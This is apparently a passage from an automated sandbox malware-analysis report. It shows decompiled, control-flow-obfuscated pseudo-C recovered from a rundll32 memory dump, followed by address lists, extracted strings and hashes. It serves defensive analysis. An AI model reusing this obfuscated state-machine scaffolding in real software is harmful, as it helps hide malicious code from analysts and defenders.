									if(_t1225 == 0x159448ba) {
										E0020C562(_v540,  &_v80, _v332, _v192);
										_t1225 = 0x17799f6a;
										continue;
									}
									__eflags = _t1225 - 0x1653011b;
									if(_t1225 == 0x1653011b) {
										E0020F536(_v384, _v256, _v300, _v140);
										_t1225 = 0x21caf663;
										continue;
									}
									__eflags = _t1225 - 0x17799f6a;
									if(_t1225 == 0x17799f6a) {
										_t1138 = E00209A37( &_v112,  &_v132, _v460, _v548);
										asm("sbb ecx, ecx");
										_t1225 = ( ~_t1138 & 0x1d975e2e) + 0x7ff6f9b;
										continue;
									}
									__eflags = _t1225 - 0x1b19f75b;
									if(_t1225 != 0x1b19f75b) {
										break;
									}
									_t1144 = E002173AC();
									asm("sbb ecx, ecx");
									_t1225 = ( ~_t1144 & 0x1b44a5c9) + 0x1bd1caec;
									continue;
								}
								if(__eflags == 0) {
									_t1144 = E0020F444(_t1225);
									L112:
									return _t1144;
								}
								__eflags = _t1225 - 0x10f69b27;
								if(_t1225 == 0x10f69b27) {
									_t1144 = E0021AB96();
									_t1225 = 0x326a8235;
									continue;
								}
								__eflags = _t1225 - 0x11454f34;
								if(_t1225 == 0x11454f34) {
									_t1144 = E0020D7EB();
									_t1225 = 0x356cf65c;
									continue;
								}
								__eflags = _t1225 - 0x11dfa862;
								if(__eflags == 0) {
									_t1225 = 0x376e2cde;
									continue;
								}
								__eflags = _t1225 - 0x13c96655;
								if(_t1225 != 0x13c96655) {
									break;
								}
								_t1144 = E002062A3();
								goto L112;
							}
							if(_t1392 == 0) {
								_t1140 = E0020153C();
								asm("sbb ecx, ecx");
								_t1257 =  ~_t1140 & 0x061fd120;
								__eflags = _t1257;
								goto L32;
							}
							_t1393 = _t1225 - 0x55e3088;
							if(_t1393 > 0) {
								__eflags = _t1225 - 0x7ff6f9b;
								if(_t1225 == 0x7ff6f9b) {
									_t1336 = _v436;
									E0020F536(_v556, _t1336, _v564, _v80);
									_t1225 = 0x3140af28;
									continue;
								}
								__eflags = _t1225 - 0xb356ed5;
								if(_t1225 == 0xb356ed5) {
									_t1144 = E0020C2E2();
									_v104 = _t1144;
									_t1225 = 0x288da576;
									continue;
								}
								__eflags = _t1225 - 0xd8c7d27;
								if(_t1225 == 0xd8c7d27) {
									_push( &_v68);
									_t1336 = _v572;
									_t1144 = E00212349(_v280, _t1336, _v468, _v580, _t1225);
									_t1387 = _t1387 + 0x10;
									__eflags = _t1144;
									if(__eflags == 0) {
										L28:
										_t1225 = 0x15603e6b;
										continue;
									}
									_t1336 = _v316;
									_v112 =  &_v68;
									_t1144 = E0020DFE2(_v400, _t1336,  &_v68);
									_v108 = _t1144;
									_t1225 = 0x2267098;
									continue;
								}
								__eflags = _t1225 - 0xda99535;
								if(_t1225 != 0xda99535) {
									break;
								}
								E00217D03();
								_t1144 = E00208317();
								L25:
								_t1225 = 0x23233137;
								continue;
							}
							if(_t1393 == 0) {
								_t1144 = E002163C1();
								_t1225 = 0x3544b2a;
								continue;
							}
							if(_t1225 == 0x13a2b08) {
								_t1225 = 0x282d346f;
								continue;
							}
							if(_t1225 == 0x2267098) {
								_t1144 = E0021611C();
								_v72 = _t1144;
								_t1225 = 0xb356ed5;
								continue;
							}
							if(_t1225 == 0x2a32d0a) {
								_t1225 = 0x34a6f88;
								continue;
							}
							if(_t1225 == 0x34a6f88) {
								_t1144 = E00213632(__eflags);
								__eflags = _t1144;
								if(__eflags == 0) {
									goto L112;
								} else {
									_t1225 = 0x3833d453;
									continue;
								}
							}
							if(_t1225 != 0x3544b2a) {
								break;
							} else {
								_t1144 = E00211BDF();
								_t1225 = 0x371670b5;
								continue;
							}
							L54:
							__eflags = _t1225 - 0x2e6b2744;
							if(__eflags > 0) {
								__eflags = _t1225 - 0x35bdcd5f;
								if(__eflags > 0) {
									__eflags = _t1225 - 0x371670b5;
									if(_t1225 == 0x371670b5) {
										E00218F49();
										_t1225 = 0x30491502;
										break;
									}
									__eflags = _t1225 - 0x376e2cde;
									if(__eflags == 0) {
										_v148 = E0020F85D(_v472, __eflags,  &_v144, _v212, _v312, _v480);
										E002048BD( &_v148, _v204, _v456, _v464);
										_t1387 = _t1387 + 0x18;
										_t1336 = _v148;
										E00212025(_v304, _t1336, _v196, _v448);
										_t1225 = 0x13a2b08;
										continue;
									}
									__eflags = _t1225 - 0x37f9587b;
									if(__eflags == 0) {
										_v96 = 0x1346150;
										_t1225 = 0x2e6b2744;
										continue;
									}
									__eflags = _t1225 - 0x3833d453;
									if(_t1225 != 0x3833d453) {
										break;
									}
									_t1144 = E00216014(); // executed
									_t1225 = 0x1e57e2ba;
									continue;
								}
								if(__eflags == 0) {
									_t1336 = _v320;
									_t1144 = E0021A0AF(_v504, _t1336, _v512,  &_v88);
									_t1225 = 0x159448ba;
									continue;
								}
								__eflags = _t1225 - 0x30491502;
								if(_t1225 == 0x30491502) {
									_t1144 = E0020EE78();
									__eflags = _t1144;
									if(__eflags == 0) {
										goto L112;
									}
									_t1225 = 0x2a91822d;
									continue;
								}
								__eflags = _t1225 - 0x3140af28;
								if(_t1225 == 0x3140af28) {
									_t1336 = _v228;
									_t1144 = E0020F536(_v328, _t1336, _v336, _v88);
									goto L25;
								}
								__eflags = _t1225 - 0x326a8235;
								if(__eflags == 0) {
									_t1336 =  &_v124;
									_t1144 = E002171EF(_t1336, __eflags, _v528);
									__eflags = _t1144;
									if(__eflags != 0) {
										asm("xorps xmm0, xmm0");
										asm("movlpd [esp+0x1d0], xmm0");
									}
									L95:
									_t1225 = 0x1653011b;
									continue;
								}
								__eflags = _t1225 - 0x356cf65c;
								if(_t1225 != 0x356cf65c) {
									break;
								}
								_t1144 = E002167F0();
								_t1225 = 0x13c96655;
								continue;
							}
							if(__eflags == 0) {
								_v92 = 0x1388;
								_t1225 = 0x35bdcd5f;
								continue;
							}
							__eflags = _t1225 - 0x23233137;
							if(__eflags > 0) {
								__eflags = _t1225 - 0x2596cdc9;
								if(_t1225 == 0x2596cdc9) {
									_push(_v388);
									_push(_v584);
									_push(_v380);
									_t1336 = _v260;
									_push( &_v132);
									_push( &_v140);
									_t1172 = E00209FDC(_t1336);
									_t1389 = _t1387 + 0x14;
									__eflags = _t1172;
									if(_t1172 == 0) {
										E0020790F();
										E002078A5(_t1225, _t1225, 0x1f40, _t1225, 0xfa0);
										_t1387 = _t1389 + 0x10;
										_t1144 = E00208317();
										_t1225 = 0x21caf663;
										asm("adc ebx, 0x0");
									} else {
										_t1384 = 0x35bdcd5f;
										_t1213 = E002078A5(_t1225, _t1225, 0xef420, _t1225, 0xdbba0);
										_t1387 = _t1389 + 0x10;
										_t1144 = E00208317();
										_t1224 = _t1336;
										_t1348 = _t1144 + _t1213;
										_t1225 = 0x21c9d3c7;
										asm("adc ebx, 0x0");
									}
									while(1) {
										L1:
										goto L2;
									}
								}
								__eflags = _t1225 - 0x282d346f;
								if(_t1225 == 0x282d346f) {
									_t1384 = 0xd8c7d27;
									_t1186 = E002078A5(_t1225, _t1225, 0x2ee0, _t1225, 0xfa0);
									_t1387 = _t1387 + 0x10;
									_t1144 = E00208317();
									_t1224 = _t1336;
									_t1348 = _t1144 + _t1186;
									_t1225 = 0x23233137;
									asm("adc ebx, 0x0");
									goto L1;
								}
								__eflags = _t1225 - 0x288da576;
								if(_t1225 == 0x288da576) {
									_t1144 = E0020F326();
									_v100 = _t1144;
									_t1225 = 0x37f9587b;
									continue;
								}
								__eflags = _t1225 - 0x2a91822d;
								if(_t1225 != 0x2a91822d) {
									break;
								}
								E00213895();
								_t1144 = E00207903();
								asm("sbb ecx, ecx");
								_t1225 = ( ~_t1144 & 0xdbd858d8) + 0x356cf65c;
								continue;
							}
							if(__eflags == 0) {
								_t1144 = _t1348 | _t1224;
								__eflags = _t1144;
								if(_t1144 != 0) {
									_t1199 = E002078A5(_t1225, _t1225, 0x4b0, _t1225, 0x190);
									_t1387 = _t1387 + 8;
									_t1336 = _t1199;
									_t1144 = E00213F62(_t1336, __eflags);
									__eflags = _t1144;
									if(__eflags != 0) {
										goto L28;
									}
									_t1144 = E00208317();
									__eflags = _t1336 - _t1224;
									if(__eflags < 0) {
										L74:
										_t1225 = 0x23233137;
										break;
									}
									if(__eflags > 0) {
										goto L69;
									}
									__eflags = _t1144 - _t1348;
									if(_t1144 >= _t1348) {
										goto L69;
									}
									goto L74;
								}
								L69:
								_t1225 = _t1384;
								break;
							}
							__eflags = _t1225 - 0x1d55cf6f;
							if(_t1225 == 0x1d55cf6f) {
								_t1144 = E002112E2();
								goto L112;
							}
							__eflags = _t1225 - 0x1e57e2ba;
							if(_t1225 == 0x1e57e2ba) {
								_t1144 = E00214B41();
								__eflags = _t1144;
								if(_t1144 == 0) {
									goto L112;
								}
								_t1144 = E002184C4(_v360);
								_t1225 = 0x1b19f75b;
								continue;
							}
							__eflags = _t1225 - 0x21c9d3c7;
							if(_t1225 == 0x21c9d3c7) {
								_t1336 = _v524;
								_t1144 = E00213FE7( &_v124, _t1336, _v240,  &_v140);
								__eflags = _t1144;
								if(__eflags == 0) {
									goto L95;
								}
								_t1144 = E002167E9();
								__eflags = _v116;
								_t1225 = 0x10f69b27;
								if(__eflags != 0) {
									__eflags = _v116 - 7;
									_t1225 =  ==  ? 0x1d55cf6f : 0x10f69b27;
								}
								continue;
							}
							__eflags = _t1225 - 0x21caf663;
							if(_t1225 != 0x21caf663) {
								break;
							}
							_t1336 = _v444;
							_t1144 = E0020F536(_v368, _t1336, _v532, _v132);
							_t1225 = 0x7ff6f9b;
						}
						__eflags = _t1225 - 0x3adf5394;
					} while (__eflags != 0);
					goto L112;
				}
			}

0x00202c69
0x00202c6f
0x00202c7d
0x00202c88
0x00202c8d
0x00202c97
0x00202c9c
0x00202ca2
0x00202ca7
0x00202caf
0x00202cba
0x00202ccd
0x00202cd0
0x00202cd7
0x00202ce2
0x00202ced
0x00202cf8
0x00202d0e
0x00202d15
0x00202d20
0x00202d2b
0x00202d3a
0x00202d3f
0x00202d48
0x00202d50
0x00202d5b
0x00202d66
0x00202d6e
0x00202d79
0x00202d8b
0x00202d8e
0x00202d9d
0x00202da4
0x00202daf
0x00202dc2
0x00202dc9
0x00202dd4
0x00202ddf
0x00202dea
0x00202df5
0x00202e00
0x00202e0b
0x00202e16
0x00202e21
0x00202e2c
0x00202e34
0x00202e3f
0x00202e4a
0x00202e55
0x00202e5d
0x00202e68
0x00202e73
0x00202e7e
0x00202e89
0x00202e94
0x00202e9f
0x00202eac
0x00202eb7
0x00202ec2
0x00202ecd
0x00202ed8
0x00202ee3
0x00202eee
0x00202ef9
0x00202f01
0x00202f0c
0x00202f17
0x00202f2c
0x00202f2f
0x00202f30
0x00202f37
0x00202f42
0x00202f4d
0x00202f58
0x00202f6e
0x00202f75
0x00202f80
0x00202f8b
0x00202f96
0x00202fa1
0x00202fac
0x00202fb7
0x00202fbf
0x00202fca
0x00202fd2
0x00202fda
0x00202fdf
0x00202fe7
0x00202fef
0x00202ffa
0x00203005
0x00203010
0x00203025
0x0020302c
0x00203037
0x00203042
0x0020304d
0x00203058
0x00203063
0x00203076
0x0020307d
0x00203088
0x00203093
0x0020309e
0x002030a9
0x002030b4
0x002030c6
0x002030c9
0x002030d0
0x002030db
0x002030e6
0x002030f3
0x002030f7
0x002030ff
0x00203104
0x0020310c
0x00203117
0x00203122
0x0020312d
0x00203138
0x0020314b
0x00203154
0x0020315f
0x00203167
0x0020316f
0x00203177
0x0020317c
0x00203184
0x00203192
0x00203197
0x002031a1
0x002031a4
0x002031ad
0x002031b1
0x002031b9
0x002031cc
0x002031d3
0x002031de
0x002031e9
0x002031f4
0x002031ff
0x00203207
0x00203212
0x0020321d
0x00203228
0x00203230
0x0020323b
0x00203246
0x00203251
0x0020325c
0x00203267
0x00203272
0x0020327a
0x00203285
0x00203290
0x00203298
0x002032a3
0x002032ab
0x002032b6
0x002032c1
0x002032c9
0x002032d4
0x002032df
0x002032ea
0x002032f5
0x00203300
0x0020330b
0x00203316
0x0020331e
0x00203329
0x00203334
0x00203347
0x0020334e
0x00203359
0x00203364
0x0020336f
0x0020337a
0x00203385
0x00203390
0x0020339b
0x002033a6
0x002033ae
0x002033b9
0x002033c1
0x002033ce
0x002033d2
0x002033da
0x002033e2
0x002033ed
0x002033f5
0x00203402
0x0020340d
0x00203418
0x00203423
0x0020342e
0x00203439
0x00203444
0x0020344f
0x00203457
0x00203465
0x0020346a
0x00203470
0x00203474
0x0020347c
0x00203487
0x00203492
0x0020349d
0x002034a8
0x002034b3
0x002034bb
0x002034c3
0x002034c8
0x002034d0
0x002034db
0x002034e6
0x002034f1
0x002034fc
0x0020350e
0x00203513
0x0020351c
0x00203527
0x00203532
0x0020353d
0x00203548
0x00203550
0x0020355b
0x00203566
0x00203571
0x0020357c
0x00203587
0x0020358f
0x0020359a
0x002035a2
0x002035af
0x002035b0
0x002035b4
0x002035bc
0x002035c4
0x002035cf
0x002035da
0x002035e5
0x002035f0
0x002035fb
0x00203606
0x00203611
0x00203619
0x0020361e
0x00203626
0x0020362b
0x00203633
0x00203647
0x0020364e
0x00203656
0x00203661
0x00203669
0x00203679
0x0020367e
0x00203684
0x0020368c
0x00203699
0x0020369c
0x002036a0
0x002036a8
0x002036b0
0x002036b8
0x002036c3
0x002036ce
0x002036d9
0x002036e4
0x002036ef
0x002036f7
0x00203702
0x0020370d
0x00203723
0x0020372a
0x00203735
0x00203740
0x0020374d
0x00203750
0x0020375c
0x00203760
0x00203765
0x0020376d
0x00203778
0x00203780
0x0020378b
0x0020379e
0x0020379f
0x002037a6
0x002037ae
0x002037b9
0x002037c1
0x002037c6
0x002037cb
0x002037d0
0x002037d8
0x002037e3
0x002037f6
0x002037fd
0x00203808
0x00203810
0x00203818
0x0020381d
0x00203822
0x0020382a
0x0020383d
0x0020384d
0x00203854
0x0020385f
0x0020386a
0x00203875
0x0020387d
0x00203888
0x00203890
0x0020389d
0x002038a1
0x002038a9
0x002038b3
0x002038be
0x002038c9
0x002038d1
0x002038dc
0x002038e4
0x002038e9
0x002038f1
0x002038f9
0x00203901
0x0020390c
0x00203917
0x00203922
0x0020392d
0x00203938
0x00203940
0x0020394b
0x00203953
0x00203958
0x00203960
0x00203965
0x0020396d
0x00203978
0x00203980
0x0020398b
0x00203993
0x0020399b
0x002039a9
0x002039ae
0x002039b4
0x002039bc
0x002039c4
0x002039c9
0x002039d1
0x002039d9
0x002039e1
0x002039f4
0x002039f7
0x002039fe
0x00203a09
0x00203a14
0x00203a1f
0x00203a2a
0x00203a35
0x00203a3d
0x00203a48
0x00203a53
0x00203a5e
0x00203a74
0x00203a82
0x00203a87
0x00203a90
0x00203a9b
0x00203aa6
0x00203ab1
0x00203abc
0x00203ac8
0x00203acb
0x00203acf
0x00203adc
0x00203ae0
0x00203ae8
0x00203b00
0x00203b09
0x00203b14
0x00203b1f
0x00203b2a
0x00203b35
0x00203b40
0x00203b53
0x00203b54
0x00203b5b
0x00203b63
0x00203b6e
0x00203b81
0x00203b90
0x00203b97
0x00203ba2
0x00203bad
0x00203bc1
0x00203bd0
0x00203bd7
0x00203be2
0x00203bef
0x00203bf3
0x00203bfd
0x00203c01
0x00203c09
0x00203c11
0x00203c16
0x00203c1e
0x00203c26
0x00203c2e
0x00203c41
0x00203c48
0x00203c53
0x00203c5e
0x00203c69
0x00203c71
0x00203c79
0x00203c7e
0x00203c86
0x00203c8e
0x00203c99
0x00203ca4
0x00203caf
0x00203cba
0x00203cc5
0x00203ccd
0x00203cd8
0x00203ce3
0x00203ceb
0x00203cf6
0x00203d01
0x00203d14
0x00203d23
0x00203d2a
0x00203d32
0x00203d3d
0x00203d48
0x00203d50
0x00203d5b
0x00203d66
0x00203d6e
0x00203d7b
0x00203d8f
0x00203d9b
0x00203da2
0x00203dad
0x00203db8
0x00203dc3
0x00203dce
0x00203dd9
0x00203de4
0x00203df9
0x00203e01
0x00203e08
0x00203e13
0x00203e2a
0x00203e2e
0x00203e36
0x00203e3b
0x00203e43
0x00203e56
0x00203e65
0x00203e6c
0x00203e77
0x00203e7f
0x00203e87
0x00203e8f
0x00203e97
0x00203e9f
0x00203eaa
0x00203eb2
0x00203ec6
0x00203ecd
0x00203ed8
0x00203ee3
0x00203ef6
0x00203efd
0x00203f08
0x00203f08
0x00203f0d
0x00203f0d
0x00203f0d
0x00203f0d
0x00203f13
0x00203f13
0x00203f19
0x00203f19
0x00204295
0x00204297
0x002042cb
0x002042d4
0x002042dc
0x00203f0d
0x00203f0d
0x00203f0d
0x00203f13
0x00203f13
0x00000000
0x00203f13
0x00203f0d
0x002042a7
0x002042b0
0x002042b2
0x0020411e
0x0020411e
0x00203f0d
0x00203f0d
0x00203f0d
0x00203f13
0x00203f13
0x00000000
0x00203f13
0x00000000
0x00203f0d
0x00203f1f
0x00203f25
0x00204129
0x0020412f
0x002041a9
0x002041af
0x00204278
0x0020427f
0x00000000
0x0020427f
0x002041b5
0x002041bb
0x0020424e
0x00204255
0x00000000
0x00204255
0x002041bd
0x002041c3
0x00204214
0x0020421f
0x00204227
0x00000000
0x00204227
0x002041c5
0x002041cb
0x00000000
0x00000000
0x002041df
0x002041e8
0x002041f0
0x00000000
0x002041f0
0x00204131
0x00204837
0x00204851
0x00204858
0x00204858
0x00204137
0x0020413d
0x0020419a
0x0020419f
0x00000000
0x0020419f
0x0020413f
0x00204145
0x00204184
0x00204189
0x00000000
0x00204189
0x00204147
0x0020414d
0x0020416c
0x00000000
0x0020416c
0x0020414f
0x00204155
0x00000000
0x00000000
0x00204162
0x00000000
0x00204162
0x00203f2b
0x0020410d
0x00204116
0x00204118
0x00204118
0x00000000
0x00204118
0x00203f31
0x00203f37
0x00203ffd
0x00204003
0x002040ea
0x002040f5
0x002040fc
0x00000000
0x002040fc
0x00204009
0x0020400f
0x002040c9
0x002040ce
0x002040d5
0x00000000
0x002040d5
0x00204015
0x0020401b
0x0020405c
0x00204069
0x00204074
0x00204079
0x0020407c
0x0020407e
0x002040b4
0x002040b4
0x00000000
0x002040b4
0x00204080
0x00204096
0x0020409d
0x002040a3
0x002040aa
0x00000000
0x002040aa
0x0020401d
0x00204023
0x00000000
0x00000000
0x00204034
0x00204042
0x0020404b
0x0020404b
0x00000000
0x0020404b
0x00203f3d
0x00203fee
0x00203ff3
0x00000000
0x00203ff3
0x00203f49
0x00203fdd
0x00000000
0x00203fdd
0x00203f55
0x00203fc7
0x00203fcc
0x00203fd3
0x00000000
0x00203fd3
0x00203f5d
0x00203faf
0x00000000
0x00203faf
0x00203f65
0x00203f98
0x00203f9d
0x00203f9f
0x00000000
0x00203fa5
0x00203fa5
0x00000000
0x00203fa5
0x00203f9f
0x00203f6d
0x00000000
0x00203f73
0x00203f81
0x00203f86
0x00000000
0x00203f86
0x002042e7
0x002042e7
0x002042ed
0x00204632
0x00204638
0x00204736
0x0020473c
0x00204818
0x0020481d
0x00000000
0x0020481d
0x00204742
0x00204748
0x002047b9
0x002047dc
0x002047e1
0x002047f2
0x00204800
0x00204807
0x00000000
0x00204807
0x0020474a
0x00204750
0x00204778
0x00204783
0x00000000
0x00204783
0x00204752
0x00204758
0x00000000
0x00000000
0x00204769
0x0020476e
0x00000000
0x0020476e
0x0020463e
0x0020471a
0x00204725
0x0020472c
0x00000000
0x0020472c
0x00204644
0x0020464a
0x002046f7
0x002046fc
0x002046fe
0x00000000
0x00000000
0x00204704
0x00000000
0x00204704
0x00204650
0x00204656
0x002046d2
0x002046e0
0x00000000
0x002046e6
0x00204658
0x0020465e
0x0020468a
0x00204691
0x00204697
0x00204699
0x0020469b
0x002046a3
0x002046b3
0x002046ba
0x002046ba
0x00000000
0x002046ba
0x00204660
0x00204666
0x00000000
0x00000000
0x00204670
0x00204675
0x00000000
0x00204675
0x002042f3
0x0020461d
0x00204628
0x00000000
0x00204628
0x002042f9
0x002042ff
0x00204463
0x00204469
0x0020453f
0x0020454d
0x00204551
0x00204558
0x0020455f
0x00204567
0x00204568
0x0020456d
0x00204570
0x00204572
0x002045c8
0x002045fb
0x00204600
0x00204605
0x00204610
0x00204615
0x00204574
0x00204578
0x002045a2
0x002045a7
0x002045ac
0x002045b3
0x002045b5
0x002045b7
0x002045bc
0x002045bc
0x00203f08
0x00203f08
0x00000000
0x00203f08
0x00203f08
0x0020446f
0x00204475
0x002044f3
0x0020451d
0x00204522
0x00204527
0x0020452e
0x00204530
0x00204532
0x00204537
0x00000000
0x00204537
0x00204477
0x0020447d
0x002044d6
0x002044db
0x002044e2
0x00000000
0x002044e2
0x0020447f
0x00204485
0x00000000
0x00000000
0x00204499
0x002044ac
0x002044b5
0x002044bd
0x00000000
0x002044bd
0x00204305
0x002043e8
0x002043e8
0x002043ea
0x0020441b
0x00204427
0x0020442e
0x00204437
0x0020443e
0x00204440
0x00000000
0x00000000
0x0020444a
0x0020444f
0x00204451
0x00204459
0x00204459
0x00000000
0x00204459
0x00204453
0x00000000
0x00000000
0x00204455
0x00204457
0x00000000
0x00000000
0x00000000
0x00204457
0x002043ec
0x002043ec
0x00000000
0x002043ec
0x0020430b
0x0020430d
0x0020484c
0x00000000
0x0020484c
0x00204313
0x00204319
0x002043c3
0x002043c8
0x002043ca
0x00000000
0x00000000
0x002043d7
0x002043dc
0x00000000
0x002043dc
0x0020431f
0x00204325
0x0020436c
0x00204377
0x0020437e
0x00204380
0x00000000
0x00000000
0x00204394
0x00204399
0x002043a1
0x002043a6
0x002043ac
0x002043b4
0x002043b4
0x00000000
0x002043a6
0x00204327
0x0020432d
0x00000000
0x00000000
0x0020433e
0x0020434c
0x00204353
0x00204353
0x00204822
0x00204822
0x00000000
0x0020482e

Strings

D>, xrefs: 002039E1
71##, xrefs: 00204459
T5W, xrefs: 00203C53
71##, xrefs: 0020404B
C!), xrefs: 002038BE
}%, xrefs: 002039D9
yI, xrefs: 00203251
);, xrefs: 00203DA2
~, xrefs: 00203633
o4-(, xrefs: 00203FDD
=, xrefs: 002033B9
QG)}, xrefs: 0020316F
0vkX, xrefs: 00202EEE
D'k., xrefs: 002042E7
k, xrefs: 00203246
bY, xrefs: 002032DF
D'k., xrefs: 00204783
nY, xrefs: 00203ABC
nlvJ, xrefs: 002035B4
P&, xrefs: 00202ED8
;R,], xrefs: 002035E5
o, xrefs: 00202E21
\$, xrefs: 00203ED8
=<, xrefs: 00202D79
FM, xrefs: 00203E77
I], xrefs: 0020378B
ny, xrefs: 00203B6E
+!, xrefs: 00203B63
d3, xrefs: 0020347C
G", xrefs: 00203A2A
n\, xrefs: 00203C8E
c, xrefs: 00203CBA
7Y, xrefs: 0020340D
,Bb*, xrefs: 00203C7E
71##, xrefs: 002042F9
DP, xrefs: 00203CD8
kU, xrefs: 002034E6
q, xrefs: 002037D8
u, xrefs: 00203D3D
71##, xrefs: 00204532
o4-(, xrefs: 0020446F
[ , xrefs: 00202E3F
jd, xrefs: 00203184

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: );$+!$,Bb*$0vkX$71##$71##$71##$71##$7Y$;R,]$=<$C!)$D'k.$D'k.$D>$DP$FM$G"$I]$P&$QG)}$T5W$[ $\$$bY$c$d3$jd$kU$nY$n\$nlvJ$ny$o4-($o4-($o$yI$}%$~$=$q$u$k
API String ID: 0-1872862241
Opcode ID: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
Instruction ID: d9909a295ce2edd27687687dec448acf2d7d8d347f6b88f4fee47fa3d3780986
Opcode Fuzzy Hash: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
Instruction Fuzzy Hash: F1D214715193818BE378DF25C58ABDFBBE1BBC4304F10891DE29A862A1DBB49954CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00214B41, Relevance: 15.2, Strings: 12, Instructions: 226
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00214B41() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _t200;
				signed int _t202;
				signed int _t206;
				void* _t210;
				signed int _t211;
				signed int _t212;
				void* _t214;
				signed int _t216;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				void* _t245;
				signed int* _t247;
				void* _t249;

				_t247 =  &_v592;
				_v592 = 0xe399;
				_v592 = _v592 << 2;
				_t214 = 0xf501058;
				_v592 = _v592 << 0xe;
				_v592 = _v592 ^ 0xe399001c;
				_v588 = 0x8f0f;
				_v588 = _v588 * 0x29;
				_t245 = 0;
				_v588 = _v588 ^ 0x0016e94e;
				_v568 = 0x725;
				_t239 = 0x36;
				_v568 = _v568 / _t239;
				_t240 = 0xc;
				_v568 = _v568 * 0x63;
				_v568 = _v568 << 8;
				_v568 = _v568 ^ 0x000ca091;
				_v532 = 0x951;
				_v532 = _v532 << 7;
				_v532 = _v532 ^ 0x0004989a;
				_v524 = 0x2ad;
				_v524 = _v524 | 0xf8213247;
				_v524 = _v524 ^ 0xf82150c2;
				_v548 = 0x8830;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 >> 0xf;
				_v548 = _v548 ^ 0x00006238;
				_v588 = 0xba20;
				_v588 = _v588 | 0x721cc32f;
				_v588 = _v588 ^ 0x721c8c06;
				_v580 = 0x8092;
				_v580 = _v580 + 0xfffffe56;
				_v580 = _v580 / _t240;
				_v580 = _v580 >> 3;
				_v580 = _v580 ^ 0x000005b6;
				_v540 = 0xe99f;
				_v540 = _v540 + 0xfffff8d3;
				_v540 = _v540 | 0x984d7063;
				_v540 = _v540 ^ 0x984d8ec7;
				_v556 = 0xc4eb;
				_t241 = 0x4e;
				_v556 = _v556 * 0x5c;
				_v556 = _v556 + 0x75ac;
				_v556 = _v556 ^ 0x00477921;
				_v536 = 0x9b3b;
				_v536 = _v536 + 0xaa1d;
				_v536 = _v536 ^ 0x00012776;
				_v572 = 0x8e84;
				_v572 = _v572 * 0x29;
				_v572 = _v572 / _t241;
				_v572 = _v572 >> 0xa;
				_v572 = _v572 ^ 0x000020e9;
				_v528 = 0xcb2d;
				_t242 = 0x21;
				_v528 = _v528 / _t242;
				_v528 = _v528 ^ 0x00001b4e;
				_v544 = 0x6df7;
				_v544 = _v544 ^ 0x414c8853;
				_t243 = 0x49;
				_v544 = _v544 * 0x75;
				_v544 = _v544 ^ 0xd824a1d7;
				_v552 = 0xc4f0;
				_v552 = _v552 ^ 0x9d070a5f;
				_v552 = _v552 + 0xffff498d;
				_v552 = _v552 ^ 0x9d0763b6;
				_v564 = 0xe384;
				_v564 = _v564 ^ 0xde12aa62;
				_v564 = _v564 | 0x2c019ae9;
				_v564 = _v564 ^ 0xa4e5f9a5;
				_v564 = _v564 ^ 0x5af67a61;
				_v576 = 0x7d9f;
				_v576 = _v576 + 0x6134;
				_v576 = _v576 | 0x6ccc595a;
				_v576 = _v576 ^ 0x0058e7ee;
				_v576 = _v576 ^ 0x6c9448a2;
				_v592 = 0x396f;
				_v592 = _v592 * 7;
				_v592 = _v592 ^ 0x10cc7cbf;
				_v592 = _v592 ^ 0x10cdfb96;
				_v560 = 0x3078;
				_v560 = _v560 << 8;
				_t244 = _v588;
				_v560 = _v560 / _t243;
				_v560 = _v560 + 0xffff6a19;
				_v560 = _v560 ^ 0x000f142e;
				goto L1;
				do {
					while(1) {
						L1:
						_t249 = _t214 - 0x3227b83a;
						if(_t249 > 0) {
							break;
						}
						if(_t249 == 0) {
							_v584 = 0xc457;
							_v584 = _v584 >> 6;
							_t165 =  &_v584;
							 *_t165 = _v584 ^ 0x0000030d;
							__eflags =  *_t165;
							_t202 =  *0x21ca2c; // 0x495cc8
							 *((intOrPtr*)(_t202 + 0x218)) = E00217CC2;
							L13:
							_t214 = 0x2ded9275;
							continue;
						}
						if(_t214 == 0xf501058) {
							_push(_t214);
							_push(_t214);
							_t206 = E00208736(0x454); // executed
							 *0x21ca2c = _t206;
							__eflags = _t206;
							if(_t206 == 0) {
								goto L23;
							}
							 *((intOrPtr*)(_t206 + 0x214)) = E002120C5;
							_t214 = 0x382146c2;
							continue;
						}
						if(_t214 == 0x204dd1d9) {
							E0020B112();
							_t214 = 0x354eaa90;
							continue;
						}
						if(_t214 == 0x24baa30b) {
							_v584 = 0xe62c;
							_t214 = 0x36e33d60;
							_v584 = _v584 ^ 0x84d80cbd;
							_v584 = _v584 ^ 0x84d8eab8;
							continue;
						}
						if(_t214 != 0x2ded9275) {
							goto L22;
						}
						_push(_t214);
						_push(_t214);
						E0020C6C7(_v536, _v572,  *0x21ca2c, _t214, _v528, _v584, _v544); // executed
						_t247 =  &(_t247[7]);
						_t214 = 0x204dd1d9;
						_t210 = 1;
						_t245 =  ==  ? _t210 : _t245;
					}
					__eflags = _t214 - 0x354eaa90;
					if(__eflags == 0) {
						E00213E3F(_t214,  &_v520, __eflags, _v552, _v564);
						_t200 = E0020E29C(_v576, _v592,  &_v520);
						_t216 =  *0x21ca2c; // 0x495cc8
						_t247 =  &(_t247[3]);
						 *((intOrPtr*)(_t216 + 0x438)) = _t200;
						_t214 = 0xae4e76a;
						goto L22;
					}
					__eflags = _t214 - 0x36e33d60;
					if(_t214 == 0x36e33d60) {
